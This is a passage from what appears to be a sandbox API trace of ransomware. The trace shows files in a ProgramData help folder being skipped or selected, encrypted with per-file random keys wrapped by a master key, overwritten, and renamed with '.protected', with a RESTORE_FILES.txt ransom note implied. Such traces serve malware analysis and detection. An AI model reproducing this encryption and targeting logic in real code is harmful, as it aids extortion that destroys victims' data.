nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.579] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.580] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.603] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.603] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.603] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.603] CloseHandle (hObject=0xa4) returned 1 [0072.603] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.protected") returned 67 [0072.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.protected")) returned 1 [0072.604] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="Windows") returned -1 
[0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.604] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.604] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.604] lstrcmpW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.604] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.604] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.604] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0072.604] StrStrW 
(lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.605] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.605] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.605] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x170, lpOverlapped=0x0) returned 1 [0072.606] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.606] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.606] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.606] CloseHandle (hObject=0xa4) returned 1 [0072.607] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.protected") returned 71 [0072.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.protected")) returned 1 [0072.607] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | 
out: lpFindFileData=0x295f400) returned 1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="Windows") returned -1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="Program Files") returned -1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.607] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.607] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.607] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.607] lstrcmpW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.607] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.607] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.607] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.608] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.608] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.608] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft 
Help\\MS.SETLANG.14.1033.hxn") returned 56 [0072.608] StrStrW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.608] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.608] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.608] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.609] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.609] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.609] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.609] CloseHandle (hObject=0xa4) returned 1 [0072.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.protected") returned 66 [0072.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.protected")) returned 1 [0072.610] FindNextFileW (in: 
hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="Windows") returned -1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="Program Files") returned -1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.610] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.610] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.610] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.610] lstrcmpW (lpString1="MS.VISIO.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.628] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.629] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.629] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.629] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.629] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0072.629] StrStrW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.629] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.630] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.630] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.630] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.630] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.630] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.630] CloseHandle (hObject=0xa4) returned 1 [0072.631] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.protected") returned 64 [0072.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.protected")) returned 1 [0072.631] 
FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.631] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.631] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.631] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.631] lstrcmpW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.631] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.631] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.631] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.632] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.632] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.632] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.632] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", 
lpSrch=".rar") returned 0x0 [0072.632] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned 58 [0072.632] StrStrW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.632] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.632] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.632] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.633] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.633] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.633] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.633] CloseHandle (hObject=0xa4) returned 1 [0072.633] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.protected") returned 68 [0072.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.protected" (normalized: 
"c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.protected")) returned 1 [0072.634] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="Windows") returned -1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="Program Files") returned -1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.634] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.634] lstrcmpW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.634] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.634] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.634] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.634] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".txt") returned 
0x0 [0072.634] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.634] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.634] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x188, lpOverlapped=0x0) returned 1 [0072.635] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.635] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x188, lpOverlapped=0x0) returned 1 [0072.636] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.636] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.636] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.636] CloseHandle (hObject=0xa4) returned 1 [0072.636] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.protected") returned 75 [0072.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft 
Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.protected")) returned 1 [0072.637] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="Windows") returned -1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="Program Files") returned -1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.637] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.637] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.637] lstrcmpW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.637] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.637] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.637] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.663] lstrlenW 
